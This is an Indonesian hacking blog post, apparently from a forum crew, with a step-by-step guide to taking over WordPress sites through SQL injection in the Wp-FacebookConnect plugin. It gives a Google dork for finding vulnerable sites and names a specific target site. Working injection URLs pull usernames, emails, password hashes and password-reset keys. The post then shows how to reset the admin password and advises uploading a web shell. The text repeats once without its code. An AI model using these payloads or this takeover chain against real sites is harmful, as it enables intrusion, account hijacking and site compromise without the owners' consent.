Hy kawan AldyPro semua, disini saya akan menunjukkan kepada kawan semua
bagaimana cara hack situs wordpress tanpa harus men-crak hash MD5.. Ok langsung saja kawan.
sekarang ini masih bekerja dengan semua exploits sqli wordpress yang ada di salah satu tema atau plugin ..
Perlu untuk diingat:
Anda tidak dapat memanfaatkan di versi terbaru dari wordpress selain versi 3.4.2 yang dirilis pada 6 September 2012.
BARU >> HACK WORDPRESS TERBARU 2017
sekarang masih banyak situs di luar sana yang belum diperbarui. semua versi sebelumnya dapat dieksploitasi dengan menggunakan metode ini ..
Jadi.. mari kita mulai ..
Hal yang perlu anda tahu.
1) setiap wordpress perlu dork sqli.. (kamu bisa mendapatkannya di exploit-db.com)
2) pengetahuan sqli .. (saya tidak membahas nya di thread ini coz ini bukan tentang sqli)
1) Dork Saya gunakan disini
Ada beberapa eksploitasi sqli di plugin yang berbeda dan tema wordpress. Saya gunakan Exploit salah satu plugin yang disebut Wp-FacebookConnect.. dan dork google yang saya gunakan adalah ..
sekarang paste kode ini di google.com (salah satu teman terbaik saya)
dan kamu akan melihat banyak situs yang rentan terhadapat Sql, tetapi dulu, kemungkinan sekarang sudah banyak di upgrade ke versi baru, terngantung si punya WP ...
2) sekarang yang saya gunakan untuk target di sini adalah
di sini parameter userid rentan terhadap sqli ..
jadi mari kita lihat apa yang bisa kita dapatkan dari database ..
Saya akan mengubah URL di atas menjadi seperti ini
sekarang kamu dapat melihat saya mendapat username dengan id email ..
sekarang saya mengubah URL di atas menjadi seperti ini ..
Maka saya akan mendapatkan user name dan password yang masih hashed MD5..
(Perlu dicatat di sini .. saya menggunakan concat sini .. kamu juga dapat menggunakan group_concat untuk mendapatkan semua User (Perlu pengetahuan anda untuk belajar cara menggunakan sqli))
sekarang .. kita semua tahu bahwa kategori hash wordpress MD5 (wordpress) berbeda dari MD5 yang lain nya dan sangat sederhana, kalau yang WP sangat sulit untuk retak ..
tetapi jika kamu kreatif.. kamu harus berpikir keluar dari kotak tsb untuk mendapat cara supaya bisa memecahkan nya..
jadi sekarang ikuti langkah-langkah di bawah untuk memecahkan nya..
a) pergi ke halaman login dari situs wordpress .. dalam kasus saya ini seperti di bawah..
b) klik pada Lost your password?
c) sekarang wordpress akan meminta saya untuk username Or email .. untuk me-reset password .. dalam kasus saya ini adalah username nya 'masaru' bisa anda lihat di atas tadi, username nya "masaru" Bukan?.. jadi lanjutkan dan masukkan username ..
d) sekarang lihat apa yang di bilang di halam tsb.. "Check your e-mail for the confirmation link ("Periksa e-mail untuk link konfirmasi.")"
e) sekarang wordpress akan mengirimkan kunci aktivasi ke alamat email dari pengguna tadi "masaru" tentu nya ke email dia.. dan menetapkan nilai dari kunci aktivasi dalam basis data.. apa yang harus kita lakukan untuk mendapatkan aktivasi kunci tadi?
f) jadi sekarang saya akan mengubah URL saya ini .. untuk mendapatkan kunci aktivasi ..
dan kita dapat melihat .. kita punya kunci aktivasi di sini .. kita harus mencatat itu untuk menggunakan di suatu tempat nanti..
g) Sekarang .. yang harus kita lakukan adalah .. tanpa pergi ke alamat email untuk me-reset password .. kita hanya menambahkan URL ini saja maka nanti akan aktif dengan sendiri nya dan kita langsung di beri akses untuk mengubah password baru..
dan saya akan menggantikan KEYHERE dengan kunci aktivasi kita simpan tadi.. dan juga dengan USERNAME dengan username yang dalam kasus saya adalah 'Masaru' .. jadi URL di atas tadi akan menjadi seperti di bawah ini ..
dan lihat nanti.. wordpress akan meminta kamu untuk membuat password baru ubah lah seperti yang anda ingin kan di page tsb
dan sekarang pergi ke halaman login lagi .. dan mencoba password baru dan anda mem-punya akses ke panel Wordpress..
Dan setelah itu apa yang harus saya lakukan?
1. Pertama anda harus mempunyai satu Shell, kalau belum punya, silahkan download disini.
2. Upload Shell tersebut dan bersenang"lah di dalam, Kalau belum tahu cara meng-upload shell nya bisa anda lihat Disini sudah saya post treads nya dgn Video
Semoga bermanfaat buat kawan semua
Note: Saya tidak menganjurkan buat anda untuk mempraktekkan hal seperti di atas, jika ada kerusakan web orang lain maka tanggung jawab pribadi anda masing-masing jangan bawa" nama saya ok
Credits By : Forum ACT Crew
sekarang ini masih bekerja dengan semua exploits sqli wordpress yang ada di salah satu tema atau plugin ..
Perlu untuk diingat:
Anda tidak dapat memanfaatkan di versi terbaru dari wordpress selain versi 3.4.2 yang dirilis pada 6 September 2012.
BARU >> HACK WORDPRESS TERBARU 2017
sekarang masih banyak situs di luar sana yang belum diperbarui. semua versi sebelumnya dapat dieksploitasi dengan menggunakan metode ini ..
Jadi.. mari kita mulai ..
Hal yang perlu anda tahu.
1) setiap wordpress perlu dork sqli.. (kamu bisa mendapatkannya di exploit-db.com)
2) pengetahuan sqli .. (saya tidak membahas nya di thread ini coz ini bukan tentang sqli)
1) Dork Saya gunakan disini
Ada beberapa eksploitasi sqli di plugin yang berbeda dan tema wordpress. Saya gunakan Exploit salah satu plugin yang disebut Wp-FacebookConnect.. dan dork google yang saya gunakan adalah ..
Code:
inurl:"/?fbconnect_action=myhome"
sekarang paste kode ini di google.com (salah satu teman terbaik saya)
dan kamu akan melihat banyak situs yang rentan terhadapat Sql, tetapi dulu, kemungkinan sekarang sudah banyak di upgrade ke versi baru, terngantung si punya WP ...
2) sekarang yang saya gunakan untuk target di sini adalah
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2
di sini parameter userid rentan terhadap sqli ..
jadi mari kita lihat apa yang bisa kita dapatkan dari database ..
Saya akan mengubah URL di atas menjadi seperti ini
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email) ,7,8,9,10,11,12+from+wp_users--
sekarang kamu dapat melihat saya mendapat username dengan id email ..
sekarang saya mengubah URL di atas menjadi seperti ini ..
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass), 7,8,9,10,11,12+from+wp_users--
Maka saya akan mendapatkan user name dan password yang masih hashed MD5..
(Perlu dicatat di sini .. saya menggunakan concat sini .. kamu juga dapat menggunakan group_concat untuk mendapatkan semua User (Perlu pengetahuan anda untuk belajar cara menggunakan sqli))
sekarang .. kita semua tahu bahwa kategori hash wordpress MD5 (wordpress) berbeda dari MD5 yang lain nya dan sangat sederhana, kalau yang WP sangat sulit untuk retak ..
tetapi jika kamu kreatif.. kamu harus berpikir keluar dari kotak tsb untuk mendapat cara supaya bisa memecahkan nya..
jadi sekarang ikuti langkah-langkah di bawah untuk memecahkan nya..
a) pergi ke halaman login dari situs wordpress .. dalam kasus saya ini seperti di bawah..
Code:
http://masaru.ikeda.me/wp-login.php
b) klik pada Lost your password?
c) sekarang wordpress akan meminta saya untuk username Or email .. untuk me-reset password .. dalam kasus saya ini adalah username nya 'masaru' bisa anda lihat di atas tadi, username nya "masaru" Bukan?.. jadi lanjutkan dan masukkan username ..
d) sekarang lihat apa yang di bilang di halam tsb.. "Check your e-mail for the confirmation link ("Periksa e-mail untuk link konfirmasi.")"
e) sekarang wordpress akan mengirimkan kunci aktivasi ke alamat email dari pengguna tadi "masaru" tentu nya ke email dia.. dan menetapkan nilai dari kunci aktivasi dalam basis data.. apa yang harus kita lakukan untuk mendapatkan aktivasi kunci tadi?
f) jadi sekarang saya akan mengubah URL saya ini .. untuk mendapatkan kunci aktivasi ..
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa tion_key),7,8,9,10,11,12+from+wp_users--
dan kita dapat melihat .. kita punya kunci aktivasi di sini .. kita harus mencatat itu untuk menggunakan di suatu tempat nanti..
g) Sekarang .. yang harus kita lakukan adalah .. tanpa pergi ke alamat email untuk me-reset password .. kita hanya menambahkan URL ini saja maka nanti akan aktif dengan sendiri nya dan kita langsung di beri akses untuk mengubah password baru..
Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE
dan saya akan menggantikan KEYHERE dengan kunci aktivasi kita simpan tadi.. dan juga dengan USERNAME dengan username yang dalam kasus saya adalah 'Masaru' .. jadi URL di atas tadi akan menjadi seperti di bawah ini ..
Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru
dan lihat nanti.. wordpress akan meminta kamu untuk membuat password baru ubah lah seperti yang anda ingin kan di page tsb
dan sekarang pergi ke halaman login lagi .. dan mencoba password baru dan anda mem-punya akses ke panel Wordpress..
Dan setelah itu apa yang harus saya lakukan?
1. Pertama anda harus mempunyai satu Shell, kalau belum punya, silahkan download disini.
2. Upload Shell tersebut dan bersenang"lah di dalam, Kalau belum tahu cara meng-upload shell nya bisa anda lihat Disini sudah saya post treads nya dgn Video
Semoga bermanfaat buat kawan semua
Note: Saya tidak menganjurkan buat anda untuk mempraktekkan hal seperti di atas, jika ada kerusakan web orang lain maka tanggung jawab pribadi anda masing-masing jangan bawa" nama saya ok
Credits By : Forum ACT Crew
3 comments
ane malah dapet yg kek gini Check your e-mail for your new password.
T_T
coba lagi kaka ;) ga semua website bisa :*
Ngarang ae !!!
EmoticonEmoticon